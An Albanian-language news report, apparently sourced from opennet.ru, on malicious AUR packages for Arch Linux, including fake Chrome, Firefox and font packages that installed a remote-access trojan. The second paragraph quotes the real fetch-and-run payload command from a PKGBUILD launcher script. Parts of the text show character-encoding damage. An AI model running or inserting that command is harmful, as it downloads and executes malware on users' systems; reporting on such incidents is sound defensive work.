Në depozitarin AUR (Arch User Repository), i përdorur në Arch Linux për shpërndarjen e paketave nga zhvillues të jashtëm, vazhdoi publikimi i kodeve të dëmshme, të integruara në paketat me ndërtimet jozyrtare të shfletuesve. Përveç paketave të dëmshme të identifikuara dy javë më parë, firefox-patch-bin, librewolf-fix-bin dhe zen-browser-patched-bin, në AUR u shtua paketa google-chrome-stable, e cila gjithashtu përmbante një modifikim që instalonte një komponent të dëmshëm, që ofronte qasje të largët në sistem.
NĂ« skedarin PKGBUILD tĂ« paketĂ«s problematike u identifikua instalimi i njĂ« skripti pĂ«r ekzekutimin e shfletuesit google-chrome-stable.sh, ku mes tĂ« tjerash kishte komandĂ«n âpython -c «$(curl https://segs.lol/9wUb1Z)»â, qĂ« shkarkonte njĂ« malware tĂ« njohur nga shĂ«rbimi VirusTotal si trojanin Spark, i cili lejonte menaxhimin e largĂ«t tĂ« sistemit, ekzekutimin e proceseve, transferimin e skedarĂ«ve, inspektimin e trafikut dhe dĂ«rgimin e ekraneve tĂ« regjistruara.
Paketa e dĂ«mshme google-chrome-stable u ngarkua para dy ditĂ«sh dhe u fshi nga administratorĂ«t e AUR disa orĂ« pas shfaqjes. Pothuajse menjĂ«herĂ« pas fshirjes sĂ« google-chrome-stable, nĂ« AUR u ngarkuan dy paketa tĂ« tjera tĂ« dĂ«mshme â «chrome» dhe «chrome-bin», qĂ« pĂ«rmbanin njĂ« skenar tĂ« ngjashĂ«m pĂ«r instalimin e malware nĂ« sistemin e pĂ«rdoruesit.
Ka pasur edhe tre paketa të tjera me kode të dëmshme: ttf-mac-fonts-all, ttf-ms-fonts-all dhe gromit.
Burimi: opennet.ru
